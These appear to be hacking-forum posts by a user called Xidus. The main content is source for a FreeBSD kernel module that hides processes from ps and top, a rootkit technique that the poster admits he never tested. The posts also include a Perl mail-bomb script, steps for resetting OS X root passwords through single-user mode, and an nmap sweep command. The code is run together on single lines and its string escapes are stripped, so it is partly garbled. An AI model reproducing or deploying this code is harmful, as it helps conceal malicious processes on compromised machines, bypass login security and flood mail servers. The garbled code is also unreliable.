Xidus

I carry a few paper clips, a ruberband, a straw, a roll of ducktape and a swissarmy knife. Thats right, I am MacGyver

From reading his post i believe he took a cat 5 cable, cut both the RJ45 connectors off, did the same with the USB cable and soldered the usb connectors to the Cat 5 cable meaning it wasn't really a cat 5 cable, just a large usb cable

Er.. Wrapping a phone in Cat 5 will make a phone... wrapped in cat 5 cable nothing else. I can think of so many reasons why that wouldn't work

Its a pretty standard way of grouping blocks but hey, Maybe i should pick up a copy, sounds like we have the same ideas XD

Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory..

nmap -sP 192.168.0.* (or what ever your watchamaccallit may be)

If you had way to much time, a vacuum pump of some kind, some carbon fibre and epoxy, you could make your own parabolic antenna....

In theory the OS doesn't even really know that the process is running

I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf

Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user)

In theory you could also do this with a simple perl script if you were on nix and wanted to save some resources.. Dont really have time to write a client to do it now but yeah.. could be done. Maybe i do have time ;) #!/usr/bin/perl # bomb.pl -- Simple perl script to send a provided message 100 times to the local mail server # Xidus use strict; use IO::Socket; my $sock = new IO::Socket::INET(PeerAddr => 'localhost', PeerPort => '25', Proto => 'tcp') or die "mooot"; my $message = "helonMAIL FROM: youremailaddress@email.comnRCPT TO: someone@someone.comnSUBJECT: mail testnDATAnAt least i have chickenn."; for (my $i=0;$i<100;$i++) { print $sock $message or die "ching"; } close($sock); coyote:~/Desktop# time perl bomb.pl real 0m0.096s user 0m0.064s sys 0m0.032s

Or you can just change and or dump the passwords in the sameish way. Hold down appple + s during reboot until you enter single user mode, then type /sbin/fsck -y then /sbin/mount -uw / and finally /sbin/SystemStarter theeen passwd root or passwd [name of the main account] :D I have found this seems to work on OS X systems before 1.0.4 (or whatever) Have fun :)

No one probably cares, but i thought i would point out that if a process is hidden and then for some reason is forced to exit, kernel memory will most probably be corrupted... The kernel will run through lists looking for the process and because it wont find the process it will run into, well... problems. To fix this it would be clever to hook either the exit function or provide some measure to find out if a process removed is about to die/be killed and add it to the lists again... whatever :)

So, I was on the plane today for a few hours and got bored and for some reason i had printed copies of a few kernel source files for FreeBSD and i thought i would whip up something a little fun. This Little kernel module loads a system call into the system that will allow the user to hide processes, now just a warning, i haven't actually run this code, but i believe that it will compile perfectly, and im pretty sure that it covers all the bases hiding processes wise, but just to be sure, not actually try to hide processes with this code from someone who knows what they are doing ;) #include <sys/types.h> #include <sys/param.h> #include <sys/proc.h> #include <sys/module.h> #include <sys/sysent.h> #include <sys/kernel.h> #include <sys/systm.h> #include <sys/queue.h> #include <sys/lock.h> #include <sys/sx.h> #include <sys/mutex.h> struct proc_hiding_args { pid_t p_pid; }; static int proc_hiding(struct thread *td, void *syscall_args) { struct proc_hiding_args *uap; uap = (struct proc_hiding_args *)syscall_args; struct proc *p; sx_xlock(&allproc_lock); sx_xlock(&proctree_lock); LIST_FOREACH(p, PIDHASH(uap->p_pid), p_hash) if (uap->p_pid == p->p_pid) { if (p->p_state == PRS_NEW) { p = NULL; break; } PROC_LOCK(p); LIST_REMOVE(p, p_hash); LIST_REMOVE(p, p_list); LIST_REMOVE(p, p_sibling); leavepgrp(p); nprocs--; PROC_UNLOCK(p); break; } sx_xunlock(&allproc_lock); sx_xunlock(&proctree_lock); return(0); } static struct sysent proc_hiding_sysent = { 1, proc_hiding }; static int offset = NO_SYSCALL; static int load(struct module *module, int cmd, void*arg) { int error = 0; switch (cmd) { case MOD_LOAD: uprintf("Loaded System call at offset %d", offset); break; case MOD_UNLOAD: uprintf("Unloaded System call at offset %d", offset); break; default: error = EOPNOTSUPP; } return (error); } SYSCALL_MODULE(proc_hiding, &offset, &proc_hiding_sysent, load, NULL); Meh, have fun, if you see a problem then post it ;)

Damn straight it would!